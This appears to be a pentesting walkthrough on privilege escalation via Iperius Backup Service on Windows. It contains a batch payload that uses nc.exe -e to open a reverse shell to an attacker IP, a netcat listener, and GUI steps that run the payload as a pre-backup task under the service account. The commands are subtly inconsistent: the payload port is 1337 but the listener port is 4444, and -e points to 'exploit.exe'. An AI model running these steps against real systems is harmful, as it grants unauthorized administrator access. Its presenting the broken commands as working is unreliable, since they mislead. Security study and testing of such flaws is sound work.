icon

Iperius Backup Service Privilege Escalation

Last modified: 2023-02-08

Iperius Backup Service is a database backup software. It is vulnerable to privilege escalation in Windows.

Investigation

First check if Iperius is running in target machine.

wmic service list | findstr "Iperius"

If the Iperius service is running, we can gain access to administrator privilege.


Exploitation

1. Create a Payload

In target machine, create a .bat file named "exploit.bat".

@echo off
C:\Users\<USERNAME>\Downloads\nc.exe <attack_machine_ip> 1337 -e exploit.exe

Then place it to Desktop.
When saving, be sure to save it as the file type "All Files" (NOT .txt).

After that start a listener in local machine.

nc -lvnp 4444

2. Create a New Backup in Iperius**

  1. Click "Iperius" icon in Windows Explorer (the common path is C:\Program Files (x86)\Iperius Backup\Iperius).
  2. Right click the "Iperius" icon on the right-bottom of the bar to open it.
  3. Click "Create New Backup" and select "Add Folder".
  4. Enter path (c:\Users\<USERNAME>\Documents) and click "OK".
  5. Navigate to "Destination" tab and select "Add Destination Folder".
  6. Enter path (c:\Users\<USERNAME>\Descktop) and click "OK".
  7. Navigate to "Other Processes" tab.
  8. On "Before backup" section, check "Run a program or open external file:" and select "exploit.bat" file.

3. Run the Backup

After setting a new backup, we can run it.
On "Iperius Backup" window, right-click on backup jobs "Documents" and select "Run backup as service" then click "OK" on the dialog.

Now we should get a shell in local machine.